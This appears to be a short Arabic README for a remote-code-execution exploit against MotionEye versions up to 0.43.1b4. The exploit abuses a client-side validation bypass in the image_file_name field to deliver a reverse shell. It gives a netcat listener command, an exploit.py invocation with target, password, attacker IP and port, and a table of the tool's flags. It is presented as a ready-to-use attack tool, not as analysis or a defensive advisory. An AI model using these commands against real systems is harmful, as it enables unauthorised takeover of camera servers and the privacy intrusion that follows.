
استغلال RCE مُوثَّق لـ MotionEye <= 0.43.1b4 عبر تجاوز التحقق من صحة العميل على حقل image_file_name. يتضمن تسليم حمولة الصدفة العكسية.
ثغرة تنفيذ أوامر عن بُعد (RCE) مصادق عليها في MotionEye <= 0.43.1b4 عبر تجاوز التحقق من جهة العميل في حقل image_file_name.
nc -lvnp 4444
python exploit.py -t http://127.0.0.1:8765 -p password -lh IP -lp 4444
| العلامة | الوصف |
|---|---|
-t | المضيف/الرابط الهدف (الافتراضي المنفذ 8765) |
-u | اسم المستخدم (الافتراضي: admin) |
-p | كلمة المرور - نفس القيمة التي تدخلها في الواجهة الرسومية / موجودة في motion.conf |
-lh | عنوان IP للمهاجم |
-lp | منفذ الاستماع |
--camera-id | معرف الكاميرا (يتم اكتشافه تلقائيًا إذا تم حذفه) |